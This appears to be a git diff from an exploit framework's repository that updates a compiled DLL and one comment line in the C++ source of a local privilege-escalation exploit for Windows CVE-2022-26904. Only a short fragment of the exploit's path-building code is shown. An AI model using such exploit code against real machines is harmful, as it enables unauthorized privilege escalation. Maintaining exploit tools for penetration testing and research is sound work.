diff --git a/data/exploits/CVE-2022-26904/CVE-2022-26904.dll b/data/exploits/CVE-2022-26904/CVE-2022-26904.dll index f3ddd42f2b..459ff0c562 100644 Binary files a/data/exploits/CVE-2022-26904/CVE-2022-26904.dll and b/data/exploits/CVE-2022-26904/CVE-2022-26904.dll differ diff --git a/external/source/exploits/CVE-2022-26904/SuperProfileDLL/ProfSvcLPE.cpp b/external/source/exploits/CVE-2022-26904/SuperProfileDLL/ProfSvcLPE.cpp index afb084743d..5b59284ca6 100644 --- a/external/source/exploits/CVE-2022-26904/SuperProfileDLL/ProfSvcLPE.cpp +++ b/external/source/exploits/CVE-2022-26904/SuperProfileDLL/ProfSvcLPE.cpp @@ -597,7 +597,7 @@ int exploit(char* incomingData) { wcscpy(appdata_local_appdata, appdata_local); wcscat(appdata_local_appdata, L"\\Application Data\0"); - // Create the directory at C:\\Users\\TEMP.WIN11-TEST.016\\AppData\\ + // Create the directory at C:\\Users\\TEMP.WIN11-TEST.016\\AppData int dir_cr_result = SHCreateDirectory(NULL, appdata); if (dir_cr_result != ERROR_SUCCESS) { wprintf(L"Couldn't create the AppData directory corresponding to the appdata variable! Error was: %i\r\n", dir_cr_result);